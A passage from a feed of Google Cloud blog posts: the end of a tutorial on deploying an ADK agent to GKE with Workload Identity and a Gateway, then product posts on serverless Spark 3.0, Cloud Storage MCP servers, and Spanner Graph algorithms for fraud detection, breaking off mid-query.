ENV UV_LINK_MODE=copy
ENV UV_COMPILE_BYTECODE=1
ENV UV_PYTHON=/usr/local/bin/python3

# Install dependencies
# We copy only files needed for installation to maximize cache
COPY pyproject.toml uv.lock ./
# Note: We don't use --frozen yet as the host lock file might be slightly out of sync
# but sync will update it in the builder stage.
RUN uv sync --no-install-project --no-dev --no-cache

# Copy the agent code
COPY . .
# Sync the project itself
RUN uv sync --no-dev --no-cache

# Stage 2: Runtime image
FROM python:3.10-slim

WORKDIR /app

# Copy the pre-built environment from the builder
COPY --from=builder /app/.venv /app/.venv
# Copy the application code (including weather_agent folder)
COPY . .

# Add the environment to the PATH
ENV PATH="/app/.venv/bin:$PATH"
ENV PYTHONUNBUFFERED=1

# Run the ADK API server
# "." is the agents directory, that is, the folder that contains weather_agent/
CMD ["adk", "api_server", ".", "--host", "0.0.0.0", "--port", "8080"]

Build and push the image to Artifact Registry:

# Create repository
gcloud artifacts repositories create adk-repo --repository-format=docker --location=$REGION

# Build and push
gcloud builds submit --tag $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest

Step 5: Implementing Workload Identity for Security

Security is paramount. Instead of hardcoding API keys, we use Workload Identity to grant the GKE pod permission to access Vertex AI.

1. Create an IAM Service Account:

gcloud iam service-accounts create adk-gke-sa

2. Grant Vertex AI permissions:

gcloud projects add-iam-policy-binding $PROJECT_ID \
    --member="serviceAccount:adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com" \
    --role="roles/aiplatform.user"

3. Allow the Kubernetes Service Account to impersonate the IAM SA:

gcloud iam service-accounts add-iam-policy-binding adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com \
    --role="roles/iam.workloadIdentityUser" \
    --member="serviceAccount:$PROJECT_ID.svc.id.goog[default/adk-ksa]"
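
The member string in the last command is easy to mistype, so the following minimal sketch shows how it is assembled from its three parts. The helper name `workload_identity_member` and the `my-project` value are hypothetical; the namespace (`default`) and Kubernetes Service Account name (`adk-ksa`) are the ones used in this tutorial and must match the manifest in the next step.

```python
def workload_identity_member(project_id: str, namespace: str, ksa_name: str) -> str:
    """Build the IAM member string for a Kubernetes Service Account."""
    return f"serviceAccount:{project_id}.svc.id.goog[{namespace}/{ksa_name}]"


# "my-project" is a placeholder project ID used only for illustration.
print(workload_identity_member("my-project", "default", "adk-ksa"))
# prints: serviceAccount:my-project.svc.id.goog[default/adk-ksa]
```

If the pod later fails to authenticate, a mismatch between this string and the actual namespace or service account name is one of the first things worth checking.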

Step 6: Deploying the Agent to GKE

Now, we define the Kubernetes resources. Create a deployment.yaml that includes the Service Account annotation for Workload Identity. kubectl does not expand shell variables inside manifests, so replace $PROJECT_ID and $REGION in the file with your actual project ID and region.

apiVersion: v1
kind: ServiceAccount
metadata:
  name: adk-ksa
  annotations:
    iam.gke.io/gcp-service-account: adk-gke-sa@$PROJECT_ID.iam.gserviceaccount.com
---
apiVersion: apps/v1
kind: Deployment
metadata:
  name: adk-agent
spec:
  replicas: 2
  selector:
    matchLabels:
      app: adk-agent
  template:
    metadata:
      labels:
        app: adk-agent
    spec:
      serviceAccountName: adk-ksa
      containers:
      - name: adk-agent
        image: $REGION-docker.pkg.dev/$PROJECT_ID/adk-repo/gke-agent:latest
        resources:
          requests:
            cpu: "500m"
            memory: "512Mi"
          limits: 
            cpu: "1"
            memory: "1Gi"
        ports:
        - containerPort: 8080
        env:
        # The image excludes .env, so pass the Vertex AI settings explicitly.
        - name: GOOGLE_GENAI_USE_VERTEXAI
          value: "TRUE"
        - name: GOOGLE_CLOUD_PROJECT
          value: "$PROJECT_ID"
        - name: GOOGLE_CLOUD_LOCATION
          value: "$REGION"
---
apiVersion: v1
kind: Service
metadata:
  name: adk-service
spec:
  selector:
    app: adk-agent
  ports:
  - port: 80
    targetPort: 8080
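
If you would rather not hand-edit the placeholders, the substitution could be scripted. The sketch below is one possible approach using only the Python standard library; the output file name `deployment.rendered.yaml` is an assumption made for illustration, and the script relies on the PROJECT_ID and REGION environment variables exported in Step 0.

```python
import os
from string import Template


def render_manifest(text: str, values: dict) -> str:
    """Replace $NAME placeholders; raises KeyError if a value is missing."""
    return Template(text).substitute(values)


def render_file(src: str = "deployment.yaml",
                dst: str = "deployment.rendered.yaml") -> None:
    """Render src with PROJECT_ID and REGION taken from the environment."""
    values = {
        "PROJECT_ID": os.environ["PROJECT_ID"],
        "REGION": os.environ["REGION"],
    }
    with open(src, encoding="utf-8") as handle:
        rendered = render_manifest(handle.read(), values)
    with open(dst, "w", encoding="utf-8") as handle:
        handle.write(rendered)
```

Calling `render_file()` from the adk-agent directory writes the rendered copy, which can then be passed to `kubectl apply -f` in place of the template. Using `substitute` rather than `safe_substitute` is deliberate: a missing variable fails loudly instead of leaving a literal `$REGION` in the image path.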

Apply the configuration:

kubectl apply -f deployment.yaml

Check the status of the deployment:

kubectl get pods -w

Once the pods are running, you can use kubectl port-forward to access the agent locally:

kubectl port-forward svc/adk-service 8080:80

Because the container runs the ADK API server without the Web UI, there is no chat interface to open at http://localhost:8080. However, we can still interact with the agent through its REST API using curl.

In a new terminal, run the following commands:

# Create a new session
curl -X POST http://localhost:8080/apps/weather_agent/users/u_123/sessions/s_123

# Run a message
curl -s -X POST http://localhost:8080/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_123",
"sessionId": "s_123",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

The curl command returns the response as JSON, and jq formats it for readability. You should see a response like:

{
    "sessionId": "s_123",
    "messages": [
        {
            "role": "assistant",
            "parts": [
                {
                    "text": "The weather in New York today is sunny with a high of 90 degrees Fahrenheit."
                }
            ]
        }
    ]
}
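
The same two calls can be made from Python, which may be more convenient once you start scripting tests against the agent. This is a minimal sketch using only the standard library: the endpoint paths and payload fields are copied from the curl commands above, while the helper names (`build_run_payload`, `post_json`, `ask`) are hypothetical. No assumption is made about the exact shape of the response, so it is returned as decoded JSON.

```python
import json
import urllib.request
from typing import Optional

# Assumes the kubectl port-forward from the previous step is still running.
BASE_URL = "http://localhost:8080"


def build_run_payload(app_name: str, user_id: str, session_id: str, text: str) -> dict:
    """Build the JSON body for POST /run, mirroring the curl example."""
    return {
        "appName": app_name,
        "userId": user_id,
        "sessionId": session_id,
        "newMessage": {"role": "user", "parts": [{"text": text}]},
    }


def post_json(url: str, body: Optional[dict] = None):
    """POST to url, sending body as JSON when given, and decode the reply."""
    data = None
    headers = {}
    if body is not None:
        data = json.dumps(body).encode("utf-8")
        headers["Content-Type"] = "application/json"
    request = urllib.request.Request(url, data=data, headers=headers, method="POST")
    with urllib.request.urlopen(request, timeout=60) as response:
        return json.loads(response.read().decode("utf-8"))


def ask(text: str, app_name: str = "weather_agent",
        user_id: str = "u_123", session_id: str = "s_123"):
    """Create the session, then send one user message to the agent."""
    post_json(f"{BASE_URL}/apps/{app_name}/users/{user_id}/sessions/{session_id}")
    return post_json(f"{BASE_URL}/run",
                     build_run_payload(app_name, user_id, session_id, text))
```

With the port-forward active, `ask("What's the weather in New York?")` performs both requests. `urlopen` raises `urllib.error.HTTPError` on non-2xx responses, which is what you would see if the session creation request is rejected.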

(Optional) Step 7: Exposing via Gateway API and HTTPS load balancer

Finally, we expose the agent using the GKE Gateway API with a Google-managed TLS certificate. This is the recommended, production-grade approach — Google will automatically provision and renew the certificate for your domain.

NB: GKE supports other options to provision certificates. You can use Let's Encrypt with cert-manager, pre-shared certificates, or any other certificate authority. You can check the GKE documentation for more details.

First, reserve a static IP address for your load balancer:

gcloud compute addresses create adk-agent-ip --global
export AGENT_IP=$(gcloud compute addresses describe adk-agent-ip --global --format="value(address)")
echo "Your IP: $AGENT_IP"

Point your domain's DNS A record at $AGENT_IP. This tutorial uses api.yourdomain.com as the example hostname.

Create a Google-managed certificate. Replace api.yourdomain.com with your actual domain here, in gateway.yaml, and in the test commands:

gcloud compute ssl-certificates create adk-cert --domains api.yourdomain.com --global

Create a gateway.yaml with the following content:

# Gateway: HTTPS load balancer with the managed certificate and static IP
apiVersion: gateway.networking.k8s.io/v1
kind: Gateway
metadata:
  name: adk-gateway
spec:
  gatewayClassName: gke-l7-global-external-managed
  listeners:
  - name: https
    protocol: HTTPS
    port: 443
    tls:
      mode: Terminate
      options:
        networking.gke.io/pre-shared-certs: adk-cert
  addresses:
  - type: NamedAddress
    value: adk-agent-ip
---
# HTTPRoute: forward traffic to the ADK service
apiVersion: gateway.networking.k8s.io/v1
kind: HTTPRoute
metadata:
  name: adk-route
spec:
  parentRefs:
  - name: adk-gateway
  hostnames:
  - "api.yourdomain.com"
  rules:
  - backendRefs:
    - name: adk-service
      port: 80
---
apiVersion: networking.gke.io/v1
kind: HealthCheckPolicy
metadata:
  name: adk-health
  namespace: default
spec:
  default:
    checkIntervalSec: 15
    timeoutSec: 5
    healthyThreshold: 1
    unhealthyThreshold: 2
    logConfig:
      enabled: false
    config:
      type: HTTP
      httpHealthCheck:
        port: 8080
        requestPath: /health
  targetRef:
    group: ""
    kind: Service
    name: adk-service

Apply the configuration:

kubectl apply -f gateway.yaml

Certificate provisioning can take up to 20 minutes. Monitor the status with:

gcloud compute ssl-certificates describe adk-cert --global
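
Rather than re-running the command by hand, the check could be polled from a script. The following is a rough sketch, not an official tool: it assumes the `managed.status` field of the certificate resource reports `ACTIVE` once provisioning finishes, and the function names and the default retry values are arbitrary choices for illustration. The status reader is passed in as a callable so that the polling logic can be exercised without calling gcloud.

```python
import subprocess
import time
from typing import Callable


def fetch_status_with_gcloud(cert_name: str = "adk-cert") -> str:
    """Read the managed certificate status through the gcloud CLI."""
    result = subprocess.run(
        ["gcloud", "compute", "ssl-certificates", "describe", cert_name,
         "--global", "--format=value(managed.status)"],
        check=True, capture_output=True, text=True,
    )
    return result.stdout.strip()


def wait_until_active(fetch_status: Callable[[], str],
                      attempts: int = 40,
                      delay_seconds: float = 30.0) -> bool:
    """Poll until the status is ACTIVE; return False if attempts run out."""
    for attempt in range(attempts):
        if fetch_status() == "ACTIVE":
            return True
        if attempt < attempts - 1:
            time.sleep(delay_seconds)
    return False
```

A call such as `wait_until_active(fetch_status_with_gcloud)` blocks until the certificate is ready or the attempts are exhausted. Provisioning only progresses once the DNS A record resolves to the reserved IP, so a status that never changes usually points back to DNS.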

Once the status shows ACTIVE, your agent is live at https://api.yourdomain.com. You can test it with:

# Create a new session
curl -X POST https://api.yourdomain.com/apps/weather_agent/users/u_124/sessions/s_124

# Run a message
curl -s -X POST https://api.yourdomain.com/run \
-H "Content-Type: application/json" \
-d '{
"appName": "weather_agent",
"userId": "u_124",
"sessionId": "s_124",
"newMessage": {
    "role": "user",
    "parts": [{
    "text": "Hey whats the weather in new york today"
    }]
}
}' | jq .

Conclusion & Looking Ahead

By following these steps, you have successfully deployed a production-ready AI agent built with ADK onto GKE Autopilot that invokes Gemini on Vertex AI with Workload Identity for authentication. This setup ensures that your agent can scale horizontally to meet demand while maintaining a high security posture.

As you look ahead, consider integrating more complex tools or leveraging GKE's multi-cluster capabilities for even greater resilience. For more details on the technologies used here, explore the official GKE documentation and the ADK repository.

To avoid ongoing charges, delete the resources created in this tutorial when you are finished (skip the gateway, address, and certificate commands if you did not complete Step 7):

kubectl delete -f gateway.yaml
kubectl delete -f deployment.yaml
gcloud compute addresses delete adk-agent-ip --global
gcloud compute ssl-certificates delete adk-cert --global
gcloud container clusters delete $CLUSTER_NAME --region $REGION
gcloud artifacts repositories delete adk-repo --location $REGION

What’s new in serverless Managed Service for Apache Spark

Wed, 03 Jun 2026 16:00:00 +0000

Whether you use it for data preparation, real-time interactive queries, AI model training, or something entirely different, running Apache Spark at scale is demanding — you shouldn’t have to manage the underlying infrastructure too.

Late last year, we announced the general availability (GA) of our serverless Managed Service for Apache Spark runtime version 3.0, prioritizing speed, simplicity, and reliability. Since then, customer use of Managed Service for Apache Spark for data science has nearly doubled year over year. This is a testament to our belief that Google Cloud is the easier, smarter, and faster place to run your Apache Spark workloads.

In this blog, let’s dive into a few key features that make our serverless Apache Spark offering a great fit for a wide range of workflows, including feature engineering, GPU-accelerated model training and tuning, semantic search, RAG, building AI agents and applications, and more.

Zero-setup onboarding

The most significant barrier to entry for a cloud service is often the "time to magic moment" — the interval between creating a project and running your first workload. Previously, with serverless Spark, you still needed to manually configure IAM roles, VPC networking, and firewall rules before submitting a single job.

In the serverless Spark 3.0 runtime version, zero-setup onboarding significantly reduces the time to launch your first workload on serverless Spark. It does so by automating the following steps:

Permissions: Necessary IAM roles and permissions are automatically provisioned to the appropriate service accounts.
Networking: Private Google Access is auto-enabled on subnets, and system firewall policies are configured automatically.
API management: Enabling APIs is now more efficient; you can just enable the Managed Service for Apache Spark API instead of manually having to enable several different APIs, as you did previously.

Fast startup for SLA-sensitive workloads

Latency matters, especially for interactive data science and SLA-sensitive batch pipelines. Historically, serverless Spark startup times could take several minutes. With the 3.0 runtime, we’ve dropped startup times by 75% across both standard and premium tiers, delivered automatically without any code or configuration changes and at no additional cost.

This massive improvement qualifies serverless Spark for a much broader range of SLA-sensitive workloads, and we’re always looking to optimize startup times even further.

"Serverless Spark allowed us to quickly reap benefits by removing the need for fine-grain machine management. This drove faster model development and significantly reduced our data processing costs." - César Narnajo, Principal Engineer, Moloco

Better GPU obtainability

Support for Dynamic Workload Scheduler (DWS) Flex Start Mode in the serverless 3.0 runtime version allows serverless Spark to queue customer requests for a configurable duration when GPUs are unavailable. This feature addresses the obtainability challenges for high-demand accelerators like NVIDIA A100 and L4, which are subject to frequent regional shortages. By pausing workloads until the necessary GPU capacity becomes accessible with DWS, you can dramatically increase obtainability and reliability for your latency-sensitive AI/ML workloads.

First-class support for Apache Spark 4.x

The serverless Spark 3.0 runtime version supports current and upcoming Apache Spark 4.x innovations, including Spark Connect, which supports a decoupled client-server architecture that enables remote connectivity from any client.

Enhanced multi-zonal support

To protect global enterprise workloads from zonal outages or hardware stockouts, the serverless Spark 3.0 runtime introduces enhanced multi-zonal support by default. The service can now automatically allocate execution nodes across multiple zones within a single region to help ensure obtainability.

Crucially, we do not charge for cross-zonal network traffic between nodes in a region, providing high availability without the traditional multi-zone tax. This is another benefit that you can realize by bringing your global Apache Spark workloads to Google Cloud.

Looking ahead

We're also continuing to innovate and push the boundaries of ease of use in areas such as history-based autotuning and goal-based autoscaling.

Get started today

You can take advantage of these features today by specifying runtime_version: 3.0 in your batch workloads or interactive sessions. To run your first workload on serverless Spark, perform the following simple steps:

Enable the Managed Service for Apache Spark API.
If you aren’t the project owner, ask your project admin for the serverless Managed Service for Apache Spark Editor (roles/dataproc.serverlessEditor) role on the project.

Now you’re ready to start running your workloads on the Serverless 3.0 runtime version. For more details, visit our updated documentation and access serverless Managed Service for Apache Spark in the Google Cloud console.
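
To illustrate where the runtime version goes, here is a minimal sketch that builds a batch request body as a plain dictionary. It assumes the service accepts the Dataproc Serverless batch resource shape (`pysparkBatch` and `runtimeConfig.version`), which the `roles/dataproc.serverlessEditor` role above suggests but this post does not spell out. The helper name and the `gs://` URI are hypothetical.

```python
import json


def build_batch_body(main_python_file_uri: str, runtime_version: str = "3.0") -> dict:
    """Build a batch request body that pins the runtime version."""
    return {
        "pysparkBatch": {"mainPythonFileUri": main_python_file_uri},
        "runtimeConfig": {"version": runtime_version},
    }


# Hypothetical script location, used only for illustration.
body = build_batch_body("gs://example-bucket/jobs/wordcount.py")
print(json.dumps(body, indent=2))
```

Pinning the version explicitly, instead of relying on the service default, keeps a pipeline on the 3.0 runtime even if the default changes later.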

Connecting AI agents with unstructured data using Google Cloud Storage MCP Servers

Tue, 02 Jun 2026 17:00:00 +0000

Google Cloud Storage (GCS) is a foundational component of the modern agentic tech stack and the preferred home for unstructured data at scale. As enterprises deploy agents in production, the critical focus has shifted to turning data into context and building secure, standardized integrations to access context. This is the core of smart storage: making unstructured data inherently agent-ready by turning passive objects into rich context for reasoning. Whether it’s automating complex financial workflows or diagnosing system failures in seconds, AI success now depends on how seamlessly agents can leverage this intelligence to make smart, high-stakes decisions.

In this blog, we will share three examples of agents built by customers using GCS, and then share how you can securely and reliably connect your agents to GCS using Model Context Protocol (MCP). Combined with smart storage features like auto annotations and object contexts, GCS MCP server makes the whole agent deployment process easy and simple.

Real-world agent success on Google Cloud Storage

We are seeing incredible innovation from customers leveraging MCP and Google’s agentic tech stack to solve complex business problems:

Palo Alto Networks built the Strata Co-Pilot agent, a screen-aware AI assistant that guides network security administrators through complex configuration flows—either by highlighting steps or executing them directly. The agent is powered by the Gemini Live API, with GCS serving as its “historical memory” connected via the GCS MCP server.
Airwallex developed an AI Assistant that understands user context, answers questions, and executes workflows on the user's behalf. For example, it can analyze expense policy documents and generate detailed approval workflows, a task that would normally take hours to do manually. The agent uses GCS to store the documents and GCS metadata to store the extracted information.

Snap's Job Optimization Agent analyzes Flink and Spark job specs, metadata, and historical metrics stored on GCS across thousands of jobs to find optimization opportunities, generate cost estimates, and tune configurations. Using this agent, Snap is already seeing investigation time reduced from 30 minutes to 30 seconds!

In all three agents, the GCS MCP server handles data operations and enforces standard RBAC and access policies.

Connecting agents to GCS using MCP

MCP has rapidly emerged as the universal standard for connecting agents to data sources, but building custom servers from scratch is often a slow, distracting process that diverts focus from innovation. This path introduces significant development overhead and risk, as it forces you to manage everything from authentication and error handling to keeping pace with GCS’s evolving capabilities. To solve this, GCS offers two powerful MCP server options — Remote and Local — allowing you to offload the foundational plumbing and focus on creating value.

1. Remote MCP server: Fully-managed
Connecting your agents to the Cloud Storage MCP server requires zero infrastructure deployment. By simply pointing your agent configuration to the managed endpoint, you gain immediate access to your unstructured data on GCS, allowing you to scale your agentic workloads effortlessly without the burden of operational overhead.

Because the Cloud Storage MCP server follows the open MCP standard, it works seamlessly with major agentic frameworks like ADK and is compatible with MCP clients. You can easily connect clients like Google Antigravity and Anthropic’s Claude by adding a Custom Connector in the settings. Simply point it to your Cloud Storage MCP endpoint, and you are ready to start building — no complex configuration files required.

Connecting an agent to storage requires robust security and governance. GCS MCP server is built on Google Cloud's standard identity, observability, and security frameworks:

Identity-first security: Authentication is handled entirely through Identity and Access Management (IAM) rather than shared keys. This ensures agents can only access data (buckets and objects) explicitly authorized by the user.
Full observability: To track agent activity, every request and action taken via these MCP servers is logged in Cloud Audit Logs. This provides security teams with a record of every interaction, maintaining visibility alongside ease of access.
MCP security - content scanning: You can optionally configure the MCP endpoint with Google’s content security service, Google Cloud Model Armor. This allows you to implement security controls against common MCP attack vectors—such as direct and indirect prompt injection attacks, MCP Tool poisoning attacks, and malicious URL/SQL injections—as well as prevent the leakage of sensitive data.

Cloud Storage MCP servers are perfect for most production use cases; however, as with all remote servers, you lose the capability to fully customize your MCP tools.

2. Local MCP Server: Self-managed for controlled customization
While the Remote server handles standard data access, Local MCP is the right choice when you need to build custom tools specific to your business logic. For example, if your agent needs to perform specialized data transformations (such as redacting PII or adding context from another internal system) whenever it reads a file from GCS, a Local MCP server allows you to define those unique capabilities.

The GCS Local MCP server is an open-source GitHub repository of Google-maintained tools that provides you with a reliable bridge to your data. Here are a few tips to keep in mind while designing custom tools:

Provide precise, clear tool descriptions to minimize incorrect invocations by models.
Implement model-friendly error handling so that models can understand their mistakes and self-correct.
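
As an illustration of both tips, here is a minimal sketch of what the body of a custom tool might look like, using the PII-redaction example from above. It is plain Python and does not use the GCS Local MCP server's actual registration API, which this post does not show; the function name, the return shape, and the deliberately simple email pattern are all assumptions.

```python
import re

# Deliberately simple pattern for illustration; real PII detection needs more.
_EMAIL_PATTERN = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}")


def redact_emails(text: str) -> dict:
    """Replace email addresses in `text` with the token [REDACTED_EMAIL].

    Use this tool after reading an object's text content and before showing
    it to a user. Pass the raw text, not a bucket or object name.
    """
    if not isinstance(text, str) or not text.strip():
        # Model-friendly error: say what was wrong and how to fix the call.
        return {
            "ok": False,
            "error": "The 'text' argument was empty.",
            "hint": "Read the object first, then pass its text content.",
        }
    redacted, count = _EMAIL_PATTERN.subn("[REDACTED_EMAIL]", text)
    return {"ok": True, "text": redacted, "redactions": count}
```

The docstring doubles as the tool description, so it states when to call the tool and what to pass. Returning a structured error with a hint, rather than raising, gives the model something it can act on in its next step.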

The GCS Local MCP is now also a part of the MCP Toolbox for Databases, a single open-source repository containing connectors for major data services such as GCS, BigQuery, AlloyDB, Spanner, and Cloud SQL, making it easier to monitor and manage your data ecosystem. The Toolbox offers simplified development with reduced boilerplate code, enhanced security through OAuth2 and OIDC, and end-to-end observability with OpenTelemetry integration.

Get started

Whether you are optimizing an existing process, as Snap did, or automating workflow creation, as Airwallex did, your unstructured data is one of your agent's greatest assets.

Explore the generally available GCS Remote MCP Server.
Check out our GCS Local MCP GitHub repository to start building custom tools today, or use it as part of MCP Toolbox for Databases.
Reach out to us to discuss your Agent use case with GCS data.

Announcing Spanner Graph algorithms: Google-grade intelligence for connected data

Tue, 02 Jun 2026 16:00:00 +0000

At Google Cloud Next, we announced the preview of graph algorithms with Spanner Graph, bringing Google Research’s state-of-the-art graph mining capabilities natively to your database. These graph intelligence capabilities can help you derive valuable insights from graph data faster, cheaper, and at scale.

Enterprises are increasingly leveraging graph technologies to uncover complex relationships in data for use cases such as fraud detection, social network analysis, entity resolution, and healthcare research. Graph algorithms, such as node centrality and community detection, are the computational methods used to analyze these structures, and work by quantifying the patterns and strength of connections between entities. However, running graph algorithms at scale has historically been challenging and resource-intensive, often requiring complex ETL pipelines to dedicated analytic solutions or risking the transactional performance of the graph database.

We designed Spanner Graph algorithms to tackle demanding enterprise workloads without compromising on the performance of your operational database. This architecture provides several distinct advantages:

Tight integration with GQL: Directly invoke algorithms using ISO Graph Query Language (GQL) to run structural analytics across your data. By sequentially weaving algorithms and standard queries together, Spanner Graph minimizes complex data movement to external engines, simplifying your architecture and accelerating time-to-insight.
Near-zero transactional impact and lower TCO: Algorithm execution happens on dedicated compute resources, so as not to impact live production traffic. Spanner automatically provisions resources and securely routes data via Data Boost without having to create a custom ETL pipeline. Pay only for what you use, avoiding expensive licensing and operational overhead of legacy solutions.
Global insights on billion-edge graphs in minutes: Built for scale and speed, our engine can run algorithms on graphs with tens of billions of edges within minutes. Encoding topologies in a dense format that’s optimized for random access enables high-performance structural analytics on massive datasets.

While Google Research has published several research papers, held workshops, and released open-source projects based on its graph mining tools (e.g., for multi-core clustering), this is the first time that they are widely available to Google Cloud customers. Let’s take a deeper look at graph algorithms, and how you can use them with Spanner Graph.

Algorithms: Deeper insights for connected data

When we first launched Spanner Graph, our goal was to reimagine graph data management with a native graph database experience within Spanner, Google’s highly scalable, distributed database. Spanner Graph unifies relational and graph models, allowing developers to query connected data using the ISO GQL, while also interoperating with Spanner's existing tabular, search, and vector capabilities. This allows you to build intelligent applications without creating complex data pipelines, duplicating data, or increasing security and governance risk.

Building on this foundation, Spanner Graph algorithms help you to extract even deeper insights from your connected data. Graph algorithms analyze the relationships and connections within data, revealing hidden patterns and insights that might be missed with traditional analytical methods. With this launch, you can analyze connectedness to, for example, detect fraud rings, conduct clustering for entity resolution, identify points of failure in complex networks, or recommend products based on the preferences of connected users.

We use graphs extensively at Google. In fact, many popular algorithms like PageRank, the foundational technology that powers Google Search, were invented here. With native algorithm support in Spanner Graph, we are bringing some of Google’s leading graph intelligence capabilities directly to Google Cloud customers, with a set of essential graph algorithms that help you easily uncover the hidden structures within your data:

Centrality: Pinpoint the most influential and central nodes within your network using betweenness centrality, closeness centrality, and PageRank.
Community detection: Automatically group highly connected entities to uncover hidden segments with label propagation, correlation clustering, modularity clustering, weakly connected components, and clique aggregator.
Similarity and path finding: Find optimal routes using set-to-set shortest paths, or measure node similarities using Jaccard, cosine, common neighbors, and total neighbors.
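
To give a feel for what the similarity measures compute, here is a small sketch using textbook definitions over sets of neighbors. It is meant only to build intuition: Spanner Graph's exact definitions (for example, how edge direction is handled) are not described here and may differ, and the account names are hypothetical.

```python
import math


def neighbor_similarity(a: set, b: set) -> dict:
    """Compute four neighborhood-overlap measures for two nodes."""
    common = len(a & b)
    total = len(a | b)
    return {
        "common_neighbors": common,
        "total_neighbors": total,
        "jaccard": common / total if total else 0.0,
        # Cosine over binary neighbor vectors: |A & B| / sqrt(|A| * |B|).
        "cosine": common / math.sqrt(len(a) * len(b)) if a and b else 0.0,
    }


# Hypothetical accounts and the counterparties each one transfers to.
neighbors = {
    "acct_1": {"acct_3", "acct_4", "acct_5"},
    "acct_2": {"acct_4", "acct_5", "acct_6"},
}
print(neighbor_similarity(neighbors["acct_1"], neighbors["acct_2"]))
```

Here the two accounts share two of four distinct counterparties, so the Jaccard score is 0.5. Two accounts that rarely transact with each other but share most of their counterparties would still score highly, which is why these measures are useful for entity resolution.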

An integrated developer experience

You can invoke graph algorithms directly using GQL on the entire graph, subgraphs, or a select set of nodes and edges. Spanner offers an integrated workflow: results from graph algorithm runs can be written directly back to Spanner Graph. This lets you invoke algorithms and standard queries sequentially, using the output of one operation as input to the next. You can also store results in Cloud Storage buckets.

Example: Uncovering the ringleader of a fraudulent network

Consider a scenario where you are analyzing financial transactions to combat money laundering. Fraudsters usually manipulate a set of “mule” accounts (intermediary accounts for money laundering) that interact with one another to collectively commit fraud. To capture the teamwork between detected and hidden mule accounts, anti-fraud experts usually resort to link analysis and community detection graph algorithms. Here’s how you can use algorithms and queries together in Spanner Graph to catch them.

Step 1: Identify communities of accounts (algorithm)
First, we apply a modularity clustering algorithm to cluster accounts into communities. We then write the resulting community_id directly back to the Account table in Spanner Graph.

    -- Runs community detection and writes the results back to the graph
    EXPORT DATA OPTIONS(
      format = 'CLOUD_SPANNER',
      table = 'Account',
      write_mode = 'update_ignore_all'
    ) AS
    GRAPH FinGraph
    CALL ModularityClustering(
      node_labels => ['Account'],
      edge_labels => ['Transfer']
    )
    YIELD node, cluster
    RETURN node.id, cluster AS community_id;
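
For intuition about what a modularity clustering algorithm optimizes, the following Python sketch scores a given partition using the standard modularity formula for an undirected, unweighted graph. It is an illustration only: it treats edges as undirected (unlike the directed Transfer edges above), the sample graph is hypothetical, and it does not search for the best partition or reflect Spanner Graph's implementation.

```python
from collections import defaultdict


def modularity(edges, community_of):
    """Modularity Q of a partition of an undirected, unweighted graph."""
    m = len(edges)
    if m == 0:
        return 0.0
    intra = defaultdict(int)   # edges with both endpoints in the same community
    degree = defaultdict(int)  # sum of node degrees per community
    for u, v in edges:
        cu, cv = community_of[u], community_of[v]
        degree[cu] += 1
        degree[cv] += 1
        if cu == cv:
            intra[cu] += 1
    # Q = sum over communities of (intra-community edge share - expected share).
    return sum(intra[c] / m - (degree[c] / (2 * m)) ** 2 for c in degree)


# Two triangles joined by a single bridge edge (hypothetical accounts).
EDGES = [("a", "b"), ("b", "c"), ("a", "c"),
         ("d", "e"), ("e", "f"), ("d", "f"),
         ("c", "d")]
TWO_GROUPS = {"a": 0, "b": 0, "c": 0, "d": 1, "e": 1, "f": 1}
ONE_GROUP = {node: 0 for node in "abcdef"}

print(modularity(EDGES, TWO_GROUPS))  # higher: the split matches the structure
print(modularity(EDGES, ONE_GROUP))   # zero: one big community carries no signal
```

A higher score means more edges fall inside communities than a random graph with the same degrees would suggest, which is why splitting the two triangles scores better than lumping every account together.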

Step 2: Pinpoint the suspicious community (query)
Now that every account belongs to a community, we can run GQL queries against each community to uncover anomalous behavior. For example, we can count the known fraud accounts within each community.

    -- Finds the community with the highest concentration of flagged fraud
    GRAPH FinGraph
    MATCH (a:Account)
    WHERE a.community_id IS NOT NULL
      AND a.fraud_flag = TRUE
    RETURN a.community_id AS community_id, COUNT(*) AS fraud_count
    ORDER BY fraud_count DESC;

Step 3: Calculate influence to find the "ringleader" (algorithm on a subgraph)
Let's assume the query above reveals that Community 2 has seen a massive spike in fraudulent activity. In this step, we filter the graph to isolate only the accounts in that specific community and run the PageRank algorithm to find the central ringleader within that exact group.

    EXPORT DATA OPTIONS(
      format = 'CLOUD_SPANNER',
      table = 'Account',
      write_mode = 'update_ignore_all'
    ) AS
    -- Specifies a suspicious subgraph
    GRAPH FinGraph
    MATCH (n:Account {community_id: 2})
    RETURN n
    FULL UNION ALL
    MATCH -[e:Transfer]->
    RETURN e
    NEXT
    -- Runs PageRank
    CALL PER() PageRank(max_iterations => 20)
    YIELD node, score
    RETURN node.id, score AS pagerank_score;
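
To show what the PageRank step computes, here is a small power-iteration sketch in Python. The damping factor of 0.85 is a common textbook default and an assumption here, as are the account names and transfers; the sketch does not describe how Spanner Graph implements or parameterizes PageRank beyond the max_iterations value used above.

```python
def pagerank(nodes, edges, damping=0.85, max_iterations=20):
    """Power-iteration PageRank over directed (source, target) edges."""
    n = len(nodes)
    out_links = {node: [] for node in nodes}
    for src, dst in edges:
        out_links[src].append(dst)
    score = {node: 1.0 / n for node in nodes}
    for _ in range(max_iterations):
        # Rank held by nodes without outgoing edges is spread evenly.
        dangling = sum(score[v] for v in nodes if not out_links[v])
        nxt = {v: (1.0 - damping) / n + damping * dangling / n for v in nodes}
        for src in nodes:
            targets = out_links[src]
            for dst in targets:
                nxt[dst] += damping * score[src] / len(targets)
        score = nxt
    return score


# Hypothetical community: three mule accounts funnel money to one account.
ACCOUNTS = ["m1", "m2", "m3", "boss"]
TRANSFERS = [("m1", "boss"), ("m1", "m2"), ("m2", "boss"), ("m3", "boss")]

scores = pagerank(ACCOUNTS, TRANSFERS)
ringleader = max(scores, key=scores.get)
print(ringleader, round(scores[ringleader], 3))
```

Because every mule account sends funds toward the same destination, that account accumulates the highest score, which is the signal Step 3 relies on.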

Step 4: Investigate the target (query)
Now that the accounts in Community 2 have a pagerank_score, we can write a query that isolates the most central account and traces where that ringleader recently moved their funds.

    -- Finds the top scorer (ringleader) and traces their money
    GRAPH FinGraph
    MATCH (ringleader:Account {community_id: 2})
